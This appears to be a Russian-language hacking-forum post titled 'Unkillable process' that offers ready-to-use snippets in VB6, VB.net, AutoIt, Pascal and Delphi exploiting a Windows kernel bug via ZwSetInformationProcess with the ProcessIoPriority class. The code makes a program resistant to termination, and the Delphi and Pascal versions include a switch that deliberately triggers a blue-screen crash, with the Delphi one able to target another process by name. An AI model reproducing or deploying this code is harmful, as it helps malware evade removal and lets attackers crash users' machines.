Windows v.2.03
Последняя активность:
Регистрация: 17.01.2013
Сообщений: 21
Поблагодарили всего: 33
Неубиваемый процесс [VB6, VB.net, AutoIt, Delphi, Pascal ]
VB6 :
Код:
'Pink/Danyfirex
'All Credits http://waleedassar.blogspot.com/2013...opriority.html
Private Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
Private Declare Function ZwSetInformationProcess Lib "ntdll.dll" (ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Private Sub Form_Load()
ZwSetInformationProcess GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&
End Sub
VB.net:
Код:
'By Rottweiler
Imports System.Runtime.InteropServices
Public Class ProtectMe
#Region "VarPtr Support by Francesco Balena & Code Architects"
' -----------------------------------------------------------
' VARPTR implementation in VB.NET
' Part of VB Migration Partner’s support library
'
' Copyright © 2009, Francesco Balena & Code Architects
' -----------------------------------------------------------
Private Delegate Function VarPtrCallbackDelegate(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Short, _
ByVal unused1 As Integer, ByVal unused2 As Integer, _
ByVal unused3 As Integer) As Integer
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Integer, _
ByVal unused1 As Integer, ByVal unused2 As Integer, _
ByVal unused3 As Integer) As Integer
Private Shared Function VarPtrCallback(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer
Return address
End Function
Private Shared Function VarPtr(ByRef var As Short) As Integer
Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0)
End Function
Private Shared Function VarPtr(ByRef var As Integer) As Integer
Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0)
End Function
#End Region
<DllImport("Kernel32.dll")>
Private Shared Function GetCurrentProcess() As IntPtr
End Function
<DllImport("ntdll.dll")>
Private Shared Function ZwSetInformationProcess(ByVal _1 As IntPtr, ByVal _2 As IntPtr, ByVal _3 As IntPtr, ByVal _4 As IntPtr) As IntPtr
End Function
Public Shared Sub Protect()
ZwSetInformationProcess(GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&)
End Sub
End Class
AutoIt:
Код:
; Author Delphi : Metal_Kingdom
; Credits : waleedassar
; Reference : http://waleedassar.blogspot.com/2013...opriority.html
; Usage : sNonKillableProcess()
; Enjoy
; ========================================================================================
Func sNonKillableProcess()
Local $sProcessHandle , $sSignedvalue , $ProcessIoPriority , $sProcessInformationLength , $sStruct
If Not @Compiled Then Exit
$sProcessHandle = DllCall("kernel32.dll", "handle", "GetCurrentProcess")
$sSignedvalue = 0x8000F129 ;0xFFFFFFFF (BSOD not work on Win7 x86 )
$ProcessIoPriority = 0x21
$sProcessInformationLength = 0x4
$sStruct = DLLStructCreate("Byte[4]")
DllStructSetData($sStruct, 1, $sSignedvalue)
$sRet = DllCall ("ntdll.dll" , "none" , "ZwSetInformationProcess" , "int" , $sProcessHandle[0] , "int" , _
$ProcessIoPriority , "int" , DllStructGetPtr($sStruct) , "int" , $sProcessInformationLength)
EndFunc
Pascal:
Код:
Importar "Pauscal.prp"
Proc GetCurrentProcess():Entero, "Kernel32.dll"
Proc ZwSetInformationProcess(p1,p2,p3,p4:EnteroSig):Entero, "ntdll.dll"
Var Val:EnteroSig
Val = &8000F129 ' &FFFFFFFF ' BSOD
ZwSetInformationProcess(GetCurrentProcess(),&21,Val@,Long(Val))
Repetir
Pausar(1000)
PorSiempre
Delphi:
Код:
//All Credits: http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html
//Metal_Kingdom | UdTools.net
function ZwSetInformationProcess(cs1:THandle; cs2:ULONG; cs3:Pointer; cs4:ULONG):ULONG; stdcall; external 'ntdll.dll';
function Non_Killable(Process: String; BSOD: Bool): ULONG;
var
Val : ULONG;
ProcessEntry : TProcessEntry32;
hSnapshot : THandle;
ProcessHandle : THandle;
ProcessID : DWORD;
begin
case BSOD of
True : Val := $FFFFFFFF;
False : Val := $8000F129;
end;
hSnapshot := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
ProcessEntry.dwSize := SizeOf(ProcessEntry32);
while Process32Next(hSnapshot, ProcessEntry) do
begin
if Process = ProcessEntry.szExeFile then
begin
ProcessID := ProcessEntry.th32ProcessID;
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, True, ProcessID);
CloseHandle(hSnapshot);
end;
end;
Result := ZwSetInformationProcess(ProcessHandle, $21, @Val, SizeOf(Val));
end;
Код:
non_killable('Project1.exe', False); //Sin BSOD
/
non_killable('Project1.exe', True); //Con BSOD
Убить процесс поможет программка
[Ссылки могут видеть только зарегистрированные пользователи. (c)level-23.cc
Последний раз редактировалось Apple96; 16-05-2014 в 18:25 .
Причина: Добавил ссылку
16-05-2014
Неубиваемый процесс [VB6, VB.net, AutoIt, Delphi, Pascal ]
Древовидный вид
Похожие темы